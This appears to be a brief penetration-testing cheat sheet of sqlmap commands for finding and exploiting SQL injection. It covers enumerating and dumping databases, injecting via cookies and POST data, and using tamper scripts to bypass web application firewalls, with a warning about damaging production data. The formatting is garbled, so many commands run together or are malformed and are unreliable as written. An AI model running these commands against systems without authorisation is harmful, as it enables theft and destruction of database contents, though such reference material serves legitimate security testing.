sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
Just like any fuzzing tool, these scans need to be slowed down when testing production instances as it could lead to an unintended denial of service. In addition to that, testers need to use those tools with the greatest care since creating issues with production instances databases (like overwriting or deleting data) could have a serious fallout.
Common techniques
# GET Request sqlmap-u“http://takumatest.domain/param1=value1¶m2=value2"# GET Request with a specific paramsqlmap -u “http://takumatest.domain/param1=value1¶m2=value2"-pparam2# No User Interactionsqlmap-u“http://takumatest.domain/" --batch # Enumerate databasesqlmap -u “http://takumatest.domain/"--dbs# Enumerate tablessqlmap-u“http://takumatest.domain/" -D target_DB --tables# Dump tables sqlmap --dbms=mysql -u “http://takumatest.domain/"-Dtarget_DB-Ttarget_Table--dump# List Columnssqlmap--dbms=mysql-u“http://takumatest.domain/" -D target_DB -T target_Table --columns # POST Requestsqlmap --dbms=mysql -u “http://takumatest.domain/"--data=”data1=aaa&data2=bbb”# With cookiespythonsqlmap.py-u"http://targeturl"--cookie="param1=value1*;param2=value2"# Level and Riskpythonsqlmap.py-u"http://targeturl"--dbms=mysql--level5and--risk3# Combinations sqlmap -u ‘http://targeturl/' --data=’param1=blah¶m2=blah’ --cookie=’JSESSIONID=d02084cbe50e16aa4' --batch --threads=10 --level=5 --risk=3 -p param1
# BURP Filesqlmap-rmetapress.req-ptotal_service--batch-dump# WAF Bypass -tamper=”between,randomcase,space2comment”sqlmap.py-u"http://192.168.136.131/sqlmap/mysql/get_int.php?id=1"--\tampertamper/between.py,tamper/randomcase.py,tamper/space2comment.py-vvv# Clear cache--fresh-queries--flush-session